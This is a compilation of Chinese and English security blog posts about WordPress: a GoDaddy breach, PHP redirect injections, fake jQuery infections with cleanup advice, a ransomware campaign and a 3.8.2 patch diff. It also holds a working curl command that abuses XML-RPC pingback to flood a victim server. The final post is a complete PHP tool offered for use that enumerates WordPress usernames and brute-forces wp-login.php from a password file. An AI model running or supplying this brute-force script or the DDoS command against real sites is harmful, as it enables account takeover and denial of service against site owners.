GoDaddy 的 WordPress 託管（Managed WordPress）可供客戶建置與管理網站，這項服務會為 GoDaddy 的客戶處理網站的主機管理工作，例如安裝 WordPress、每日自動備份、更新 WordPress 核心元件以及伺服器層級快取等等。

然而 GoDaddy 向 SEC 提交的文件指出，駭客在 9 月初使用遭洩漏的密碼取得其 provisioning system 的造訪權限；而 11 月 17 日 GoDaddy 發現未經授權的第三方嘗試造訪 WordPress 託管環境，在發現可疑入侵後立即將駭客封鎖在外，隨後展開調查並通報當地執法機關。

駭客不僅取得多達 120 萬 GoDaddy 客戶的電子郵件位址，還可以看到客戶的 WordPress 管理員系統預設密碼，這些電子郵件位址可能為其客戶帶來網路釣魚攻擊的風險。GoDaddy 還表示，對於活躍客戶而言，sFTP 和資料庫用戶名稱與密碼也遭外流；而一些客戶的私密金鑰也已外流，這些私密金鑰用於證明網站的真實性。

GoDaddy 團隊正在努力透過重置受影響的密碼，並且重新產生安全憑證以解決這些問題。該公司也正在聯繫所有受駭客攻擊影響的客戶，提供這次安全漏洞的具體細節。

中文引用來源

英文原始出處: GoDaddy Announces Security Incident Affecting Managed WordPress Service

#WordPress,

#GoDaddy

#WordPress 託管

#網路釣魚

The post GoDaddy 的 WordPress 託管遭駭客攻擊，逾百萬客戶電子郵件外流 first appeared on 捕夢網 Blog.

日前有資訊安全公司發現有黑客對 WordPress 網站進行攻擊，他們可修改 WordPress 網站的 PHP 程式碼並將之轉址至惡意網站。

資訊安全公司 Sururi 日前表示，黑客可在舊版 WordPress 或 WordPress 插件的漏洞取得權限，並在 header.php 中植入 12 行 惡意程式碼。Suruci 指在部分情況下，黑客可透過其他方法取得帳戶，直接在 WordPress 登入畫面正常地登入，然後在 WordPress 內建的修改工具植入有關程式碼。

除了 WordPress ，Sucuri 亦指部分 Joomla 的網站受到攻擊，把惡意程式碼貼在　administrator/includes/help.php，惟攻擊規模比 WordPress 少得多。

Sucuri 把惡意程碼分析，發現黑客的攻擊手法簡單而有效。網站被駭後，會有 15% 機會把訪客轉址到惡意網站；程式碼亦會向受害人加入 Cookies ，避免一年之內再次被轉址。不過 Sucuri 稱該惡意網站只是入口網站，進入後還會經過多重的轉址到達最終的危險網站，其中一個會假扮 Adobe Flash 或 Java 的下載點。

由於該 PHP 程式碼設計未完善，在某些網站會產生錯誤。外國媒體 SoftPedia 於 Google 搜尋過後發現有 6,400 個網站受影響，然而實際的感染數字應會更多。

文章來源:http://unwire.pro/2016/05/08/wordpress-redirect-to-malicious-sites-by-php-injection/news/

圖片來源:https://pixabay.com

The post 黑客對 WordPress 網站進行攻擊　PHP 檔案被植入程式碼轉址惡意網站 first appeared on 捕夢網 Blog.

JQuery is a very popular JavaScript library. The basic aim of this library is to erase the differences between implementations of JavaScript in various web browsers. If you have ever tried web coding you know how tedious it can be to make the code do the same thing in different browsers. Sometimes it is a really big challenge. In such situations, this library can be very useful.

Of course it is only a matter of time until such a well-known library gets the attention of those who want to use it for different purposes other than web coding. Fake jQuery injections have been very popular among hackers. And that brings us to one of the most popular infections of the last couple of months –  the attack that injects fake jQuery script into the head section of CMS websites powered by WordPress and Joomla.

What does it look like?

The script is located right before the tag </head> so as a normal visitor you can’t notice anything unless you look into source code

At first glance you see simple code that is not obfuscated. There are only a few variables and one IF statement which inserts another JavaScript source. The only thing that is changing is "var base =", which points to another hacked website that serves as a source of injected malicious script, which brings us to the point of hacked domains.

Some of the hacked domains that are used as a source for malicious JS code

The number of hacked domains is abnormally high, which is why this kind of attack was and still is very popular on a daily basis. From November 2015 we registered over 4.5 million users who encountered this infection. Malicious code was found in almost 70 million unique files on hacked websites.

The code starts with a 10 milliseconds countdown. That is a common practice in injection-type coding but a longer delay than only 10 milliseconds is more typical.

After that, it begins to take shape. As you can see “encodeURIComponent” is used almost in every line. This function encodes special characters like: (, / ? : @ & = + $ #).

All declared variables

Condition IF with (document.write)

The final condition checks if variables contain necessary values and after evaluation another source for script is inserted.

Example of injected URL after decoding is done by function (decodeURIComponent)

This URL is then used to increase SEO rank for other domains. Using referral page and backlinks makes it more valid.

Simple chart to show activity for the last month

Map showing which regions malicious injection targets the most

What if I am already hacked?

Start with your local environment

You may think that if problem is on a website so you should look for a problem there, but in many cases the source of the infection can root to your local machine (i.e., desktop, notebook, etc).

Start with a full scan of your OS. This advice extends to Windows, OS X, and Linux machines.

Scan your website

There are various ways to do this. You can use an online malware-scan tool, which is easy-to-use and a quick way to get basic information.

You can also scan with Avast Antivirus or another antivirus program. Do not forget to unhide all files and folders before running the scan..

Caution: Make sure you don't delete the system files. You want to be mindful of the various types of symptoms and how they affect your website and its visitors. For instance, malicious redirects can often be found at the root of your website in files like .htaccess, and index.php, while others will focus on the themes directory targeting index.php, header.php, footer.php, and functions.php. Some infections can even live in MySQL databases and leave no trace at all in the files themselves.

Do a backup of what you still have

If your files and database are still there, postpone your investigation and do a backup. Be sure to label them as the hacked site backup, though. You never know when you can get to the point when you can find use for your hacked backup.

I can't log into my CMS admin panel

You should start with the basics: Reset your password. If its doesn't help, you can leverage tools like phpMyAdmin and Adminer to log into your database directly, bypassing your Admin login page and resetting your user in the users table.

There are two ways: Either you get a hash of your password and add this to the database directly, or edit your admin email and then try "forgot password".

Restore from your backup

When you have a clean backup and it is not too outdated, you are in a very good situation. Re-upload all your files and restore your database and you are good to go. Make sure you delete all files because you never know which file may contain some pieces of malicious code.

What if I have no backup?

You have basically two choices.

1. You can start a new fresh site from scratch, or
2. You can attempt to manually locate and remove the malicious code.

The second choice is a very tedious and hard process with no guarantees. Even if you are an expert, chances of completely cleaning your site are low. You can spend days looking through files, removing small snippets of hacker code, but if you miss one bit, the entire hack can be replaced by the hacker in a second once the site goes online.

If have not yet been hacked and have not backed up your site, you should do it right now.

What about your hosting provider?

You may think, why me? But there could be more websites with the same problem, especially if you use shared hosting. It is worth asking your hosting provider for some advice. It is very common that hosting providers run some community forum along with their services. These forums are the  best way to share your problem and experiences. Also this can be the fastest way to deal with a problem, because more people can be involved.

Your hosting provider might also be able to confirm if a hack is an actual hack or a loss of service.

Update!

Once you are clean, don’t forget to update your installation. Older versions are more prone to hacks than newer versions.

Now when it is all over, start keeping regular backups of your database and files. If this ever happens again, you will be prepared for this situation.

文章來源:https://blog.avast.com/wordpress-and-joomla-users-get-hacked-be-aware-of-fake-jquery

圖片來源:https://pixabay.com/

The post WordPress and Joomla websites get hacked with fake jQuery first appeared on 捕夢網 Blog.

2016 年 1 月，受感染的 WordPress 網頁被植入了 admedia iframe，不僅可能在電腦上安裝後門程式，更可能將網頁瀏覽者導向含有漏洞攻擊套件的惡意網域，進而感染 TeslaCrypt勒索軟體 Ransomware 。根據 Duncan 指出，此攻擊行動第一次被發現時是在目標網站上植入 Nuclear 漏洞攻擊套件，但現在已改成植入Angler 漏洞攻擊套件。除此之外，歹徒的閘道網址也開始改用「megaadvertize」這個網域。

不過，其基本技巧還是不變：遭到感染的網站將被駭客入侵，並且在其 .js 檔案當中嵌入駭客的腳本 (script)。由於網頁在執行 JavaScript 程式碼時需要用到這些檔案，因此會將使用者導向 admedia 閘道。換句話說，網頁產生的 iframe 會打開一道從受感染的網站通向漏洞攻擊套件的路徑，進而讓電腦被植入 TeslaCrypt 勒索軟體 Ransomware 。勒索軟體目前仍是歹徒向不知情的受害者勒索錢財非常有效的一種惡意程式，而其發展速度亦無減緩的跡象。

儘管研究人員表示 Joomla 網站的感染數量仍不能和 WordPress 相比，但網站管理員仍不可掉以輕心。駭客入侵正常網站然後將它當成攻擊管道的情況似乎越來越流行，基於使用者對網站的信賴，這可以讓駭客感染到許多不知情的使用者。我們建議網站管理員務必定期修補其內容管理系統，並且隨時注意可能危及其使用者的最新威脅。

文章來源:http://blog.trendmicro.com.tw/?p=16792

圖片來源:https://pixabay.com/

The post 勒索軟體從 WordPress 蔓延至 Joomla first appeared on 捕夢網 Blog.

WordPress 3.8.2現在已經提供下載，最新的版本更新了幾個重要的安全問題，所以推薦更新。

WordPress 3.8.2修復的一個重要漏洞是cookie偽造漏洞（CVE -2014- 0166）。該漏洞可以被攻擊者利用通過偽造身份驗證Cookie，登陸網站。該漏洞是由WordPress的安全團隊成員Jon Cave發現。

第二個漏洞是許可權提升（CVE -2014- 0165）漏洞，可以使投稿人角色發佈文章。

還有後臺注入漏洞，以及在上傳檔處使用協力廠商庫導致的xss漏洞。

注入漏洞修改代碼：https://core.trac.wordpress.org/changeset/27917

是一個二次注入。

cookie偽造修復wp-includes/pluggable.php文件中：

https://github.com/WordPress/WordPress/commit/7f001bfe242580eb18f98e2889aad4ab1b33301b

   $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);
   $hash = hash_hmac('md5', $username . '|' . $expiration, $key);
 
-  if ( $hmac != $hash ) {
+  if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) {

 $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);
   $hash = hash_hmac('md5', $username . '|' . $expiration, $key);
 
–  if ( $hmac != $hash ) {
+  if ( hash_hmac( 'md5', $hmac, $key ) !== hash_hmac( 'md5', $hash, $key ) ) {
 

The post WordPress更新至 3.8.2 修復多個漏洞 first appeared on 捕夢網 Blog.

任何開啟了Pingback（默認就開啟）的WordPress的網站可以被用來做DDOS攻擊其它伺服器。

看如下日誌：

74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"

121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com"

217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr"

193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de"

..

可以發現每次請求還增加了亂數/?3162504=9747583以此來繞過緩存。

測試這種攻擊方式只需要一個curl命令就可以了：

$ curl -D -  "www.anywordpresssite.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.com/postchosen</string></value></param></params></methodCall>'

想要看你自己的網站是否被用來做了攻擊可以查看日誌當中是否包含類似如下的內容：

93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:<?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?>\x0A<methodCall>\x0A<methodName>pingback.ping</methodName>\x0A<params>\x0A <param>\x0A  <value>\x0A   <string>http://fastbet99.com/?1698491=8940641</string>\x0A  </value>\x0A </param>\x0A <param>\x0A  <value>\x0A   <string>yoursite.com</string>\x0A  </value>\x0A </param>\x0A</params>\x0A</methodCall>\x0A"



94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"

防禦此問題的推薦方法需要遮罩 XML-RPC (pingback) 的功能，WordPress主題中添加如下代碼：

add_filter( 'xmlrpc_methods', function( $methods ) {

   unset( $methods['pingback.ping'] );

   return $methods;

} );

參考資料：
http://drops.wooyun.org/news/1062

The post 超過16W的WordPress網站被用來做DDoS攻擊 first appeared on 捕夢網 Blog.

大腦混沌情況下寫的，有bug歡迎提出，由於是php的所以跑起來比較慢，下次發包還是調用命令結合hydra來爆破。

原理是通過URL /?author= 遍歷獲取用戶名，然後先跑用戶名與密碼相同的使用者，再調用同目錄下pass.txt中的密碼檔進行爆破。

默認獲取前10個用戶，可自行修改。

使用方法：

php wordpress.php http://www.test.com

<?
set_time_limit(0); 
$domain = $argv[1];
 
//获取用户名
for ($i=1; $i <= 10; $i++) {
 
    $url = $domain."/?author=".$i;
    $response = httprequest($url,0);
    if ($response == 404) {
        continue;
    }
    $pattern = "/author\/(.*)\/feed/";
    preg_match($pattern, $response, $name);
    $namearray[] = $name[1];
}
 
echo "共获取用户".count($namearray)."名用户\n";
 
echo "正在破解用户名与密码相同的用户：\n";
 
$crackname = crackpassword($namearray,"same");
 
$passwords = file("pass.txt");
 
echo "正在破解弱口令用户：\n";
 
if ($crackname) {
    $namearray = array_diff($namearray,$crackname);
}
 
crackpassword($namearray,$passwords);
 
function crackpassword($namearray,$passwords){
    global $domain;
    $crackname = "";
    foreach ($namearray as $name) {
        $url = $domain."/wp-login.php";
        if ($passwords == "same") {
            $post = "log=".urlencode($name)."&pwd=".urlencode($name)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
            $pos = strpos(httprequest($url,$post),'div id="login_error"');
            if ($pos === false) {
                echo "$name $name"."\n";
                $crackname[] = $name;
            }
        }else{
            foreach ($passwords as $pass) {
                $post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1";
                $pos = strpos(httprequest($url,$post),'div id="login_error"');
                if ($pos === false) {
                    echo "$name $pass"."\n";
                }
            }
        }
    }
    return $crackname;
}
 
 
function httprequest($url,$post){
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_URL, "$url"); 
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);
 
    if($post){
        curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
 
    $output = curl_exec($ch); 
    $httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
    curl_close($ch);
 
 
    if ($httpcode == 404) {
        return 404;
    }else{
        return $output;
    }
}
?>

參考資料：
http://drops.wooyun.org/tools/601

The post 跑wordpress使用者密碼腳本 first appeared on 捕夢網 Blog.